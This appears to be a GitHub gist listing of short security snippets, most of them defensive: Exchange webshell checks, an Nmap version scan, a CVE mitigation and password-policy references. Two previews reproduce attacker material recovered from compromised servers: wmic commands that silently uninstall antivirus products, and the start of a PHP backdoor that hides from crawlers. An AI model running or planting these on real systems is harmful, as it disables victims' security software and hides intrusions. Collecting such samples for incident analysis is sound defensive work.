
@technion
technion / Malicious.ps1
Created March 20, 2021 09:45
RE on Hafnium exploited server
$v='ipc';
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
technion / Password References.md
Last active February 13, 2024 16:47
A set of references on modern password policies

References on modern password policies

The links below give the source, the reference link and the relevant quote for each.

Standards

NIST

https://github.com/usnistgov/800-63-3/blob/nist-pages/sp800-63b/sec5_authenticators.md

Verifiers SHOULD NOT impose other composition rules (e.g., requiring mixtures of different character types or prohibiting consecutively repeated characters) for memorized secrets. Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator.

Major organisations

technion / acme-client-runner.rb
Last active August 8, 2023 16:29
Runs Acme Client
#!/usr/bin/env ruby
# We're going to need a private key.
require 'openssl'
# Initialize the client
require 'acme/client'
# We need an ACME server to talk to, see github.com/letsencrypt/boulder
ENDPOINT = 'https://acme-v01.api.letsencrypt.org/'
#ENDPOINT = 'https://acme-staging.api.letsencrypt.org'
ACCOUNT_FILE = 'account_key.pem'
<#
Exchange IIS Server Integrity Check
Identify common webshells and backdoors associated with compromises
Usage:
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates
Write-IntegrityFile [ -hashfile "filename.json" ]
#!/usr/bin/env ruby
require 'httparty'
FILELIST = [
'/dropbox.zip',
'/robots.txt', # Not from the original list - this serves as a sanity check as it usually exists
'/css/business-frontpage.css',
'/newphase.zip',
'/Doc.zip',
'/wp-content.zip',
def instacheck(name)
# Reject anything that is not 1-30 characters of lowercase letters, digits, dots or underscores.
# The pattern is anchored: an unanchored /[a-z0-9._]{,30}/ matches the empty string and so
# would accept every input.
unless /\A[a-z0-9._]{1,30}\z/.match(name)
return false
end
# Belt and braces: refuse path traversal sequences, which the character class alone allows.
if /\.\./.match(name)
return false
end
technion / hacked.php
Created December 30, 2021 09:01
hacked php
<?php
if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
technion / Exchange Version.nse
Created November 17, 2021 22:50
Scan Microsoft Exchange Version for vulnerability
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local string = require "string"
author = {"technion@lolware.net"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}
-- Detection rule based on: https://twitter.com/GossiTheDog/status/1424673929382268932
technion / CVE-2021-40444Mit.ps1
Last active September 12, 2021 08:43
CVE-2021-40444 Mitigation Script
Set-Strictmode -Version 2
# Applies reg keys from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section
for($i = 0; $i -le 3; $i++) {
$RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i"
if (-not (Test-Path $RegPath)) {
New-Item $RegPath -Force
}
technion / AutorunsVT.ps1
Created April 23, 2021 01:05
Review a CSV file from autorunsc.exe and handle VirusTotal detections
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
$detection = $item.'VT detection'
if ($detection -eq "" -or $detection -eq 'Unknown') {
continue
}
Write-Output $detection